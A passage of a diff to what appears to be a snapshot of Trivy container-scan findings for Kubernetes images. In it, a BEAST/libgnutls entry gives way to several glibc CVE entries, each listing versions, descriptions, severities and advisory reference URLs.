"https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5750-1", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3389", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23219", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", - "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", - "http://curl.haxx.se/docs/adv_20120124B.html", - "http://downloads.asterisk.org/pub/security/AST-2016-001.html", - "http://ekoparty.org/2011/juliano-rizzo.php", - "http://eprint.iacr.org/2004/111", - "http://eprint.iacr.org/2006/136", - "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", - "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", - "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", - "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", - "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", - "http://marc.info/?l=bugtraq&m=132750579901589&w=2", - "http://marc.info/?l=bugtraq&m=132872385320240&w=2", - "http://marc.info/?l=bugtraq&m=133365109612558&w=2", - "http://marc.info/?l=bugtraq&m=133728004526190&w=2", - "http://marc.info/?l=bugtraq&m=134254866602253&w=2", - "http://marc.info/?l=bugtraq&m=134254957702612&w=2", - "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", - "http://osvdb.org/74829", - "http://rhn.redhat.com/errata/RHSA-2012-0508.html", - "http://rhn.redhat.com/errata/RHSA-2013-1455.html", - "http://secunia.com/advisories/45791", - "http://secunia.com/advisories/47998", - "http://secunia.com/advisories/48256", - "http://secunia.com/advisories/48692", - "http://secunia.com/advisories/48915", - "http://secunia.com/advisories/48948", - "http://secunia.com/advisories/49198", - "http://secunia.com/advisories/55322", - "http://secunia.com/advisories/55350", - "http://secunia.com/advisories/55351", - "http://security.gentoo.org/glsa/glsa-201203-02.xml", - "http://security.gentoo.org/glsa/glsa-201406-32.xml", - "http://support.apple.com/kb/HT4999", - "http://support.apple.com/kb/HT5001", - "http://support.apple.com/kb/HT5130", - "http://support.apple.com/kb/HT5281", - "http://support.apple.com/kb/HT5501", - "http://support.apple.com/kb/HT6150", - "http://technet.microsoft.com/security/advisory/2588513", - "http://vnhacker.blogspot.com/2011/09/beast.html", - "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", - "http://www.debian.org/security/2012/dsa-2398", - "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", - "http://www.ibm.com/developerworks/java/jdk/alerts/", - "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", - "http://www.insecure.cl/Beast-SSL.rar", - "http://www.kb.cert.org/vuls/id/864643", - "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", - "http://www.opera.com/docs/changelogs/mac/1151/", - "http://www.opera.com/docs/changelogs/mac/1160/", - "http://www.opera.com/docs/changelogs/unix/1151/", - "http://www.opera.com/docs/changelogs/unix/1160/", - "http://www.opera.com/docs/changelogs/windows/1151/", - "http://www.opera.com/docs/changelogs/windows/1160/", - "http://www.opera.com/support/kb/view/1004/", - "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", - "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", - "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", - "http://www.redhat.com/support/errata/RHSA-2011-1384.html", - "http://www.redhat.com/support/errata/RHSA-2012-0006.html", - "http://www.securityfocus.com/bid/49388", - "http://www.securityfocus.com/bid/49778", - "http://www.securitytracker.com/id/1029190", - "http://www.securitytracker.com/id?1025997", - "http://www.securitytracker.com/id?1026103", - "http://www.securitytracker.com/id?1026704", - "http://www.ubuntu.com/usn/USN-1263-1", - "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", - "https://access.redhat.com/security/cve/CVE-2011-3389", - "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", - "https://bugzilla.novell.com/show_bug.cgi?id=719047", - "https://bugzilla.redhat.com/show_bug.cgi?id=737506", - "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", - "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", - "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", - "https://hermes.opensuse.org/messages/13154861", - "https://hermes.opensuse.org/messages/13155432", - "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", - "https://linux.oracle.com/cve/CVE-2011-3389.html", - "https://linux.oracle.com/errata/ELSA-2011-1380.html", - "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", - "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", - "https://ubuntu.com/security/notices/USN-1263-1", - "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "https://access.redhat.com/security/cve/CVE-2022-23219", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "https://linux.oracle.com/cve/CVE-2022-23219.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", + "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3389", - }, - { - "type": "URL", - "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - }, - { - "type": "URL", - "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - }, - { - "type": "URL", - "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", - }, - { - "type": "URL", - "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", - }, - { - "type": "URL", - "value": "http://curl.haxx.se/docs/adv_20120124B.html", - }, - { - "type": "URL", - "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", - }, - { - "type": "URL", - "value": "http://ekoparty.org/2011/juliano-rizzo.php", - }, - { - "type": "URL", - "value": "http://eprint.iacr.org/2004/111", - }, - { - "type": "URL", - "value": "http://eprint.iacr.org/2006/136", - }, - { - "type": "URL", - "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", - }, - { - "type": "URL", - "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", - }, - { - "type": "URL", - "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", - }, - { - "type": "URL", - "value": "http://osvdb.org/74829", + "value": "https://avd.aquasec.com/nvd/cve-2022-23219", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-23219", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", }, { "type": "URL", - "value": "http://secunia.com/advisories/45791", + "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/47998", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/48256", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/48692", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", }, { "type": "URL", - "value": "http://secunia.com/advisories/48915", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "http://secunia.com/advisories/48948", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", }, { "type": "URL", - "value": "http://secunia.com/advisories/49198", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "http://secunia.com/advisories/55322", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "http://secunia.com/advisories/55350", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", }, { "type": "URL", - "value": "http://secunia.com/advisories/55351", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1751", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-1751", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "https://linux.oracle.com/cve/CVE-2020-1751.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200430-0002/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1751", + ], + }, + "category": "Vulnerability", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: array overflow in backtrace functions for powerpc", + "references": [ { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "value": "https://avd.aquasec.com/nvd/cve-2020-1751", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "value": "https://access.redhat.com/security/cve/CVE-2020-1751", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT4999", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5001", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5130", + "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5281", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5501", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT6150", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "http://technet.microsoft.com/security/advisory/2588513", + "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", }, { "type": "URL", - "value": "http://vnhacker.blogspot.com/2011/09/beast.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", }, { "type": "URL", - "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "http://www.debian.org/security/2012/dsa-2398", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1752", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-1752", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "https://linux.oracle.com/cve/CVE-2020-1752.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "https://security.gentoo.org/glsa/202101-20", + "https://security.netapp.com/advisory/ntap-20200511-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1752", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: use-after-free in glob() function when expanding ~user", + "references": [ { "type": "URL", - "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", + "value": "https://avd.aquasec.com/nvd/cve-2020-1752", }, { "type": "URL", - "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "value": "https://access.redhat.com/security/cve/CVE-2020-1752", }, { "type": "URL", - "value": "http://www.insecure.cl/Beast-SSL.rar", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", }, { "type": "URL", - "value": "http://www.kb.cert.org/vuls/id/864643", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", }, { "type": "URL", - "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1151/", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1160/", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1151/", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1160/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1151/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1160/", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "http://www.opera.com/support/kb/view/1004/", + "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-6096", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-6096", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://ubuntu.com/security/notices/USN-4954-1", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + ], + }, + "category": "Vulnerability", + "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "references": [ { "type": "URL", - "value": "http://www.securityfocus.com/bid/49388", + "value": "https://avd.aquasec.com/nvd/cve-2020-6096", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49778", + "value": "https://access.redhat.com/security/cve/CVE-2020-6096", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1029190", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1025997", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026103", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026704", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", }, { "type": "URL", - "value": "http://www.ubuntu.com/usn/USN-1263-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", }, { "type": "URL", - "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-3389", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", }, { "type": "URL", - "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "value": "https://ubuntu.com/security/notices/USN-4954-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", }, { "type": "URL", - "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3326", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "https://access.redhat.com/security/cve/CVE-2021-3326", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "https://linux.oracle.com/cve/CVE-2021-3326.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210304-0007/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + ], + }, + "category": "Vulnerability", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", + "references": [ { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13154861", + "value": "https://avd.aquasec.com/nvd/cve-2021-3326", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13155432", + "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", }, { "type": "URL", - "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "value": "https://access.redhat.com/security/cve/CVE-2021-3326", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", }, { "type": "URL", - "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-1263-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - 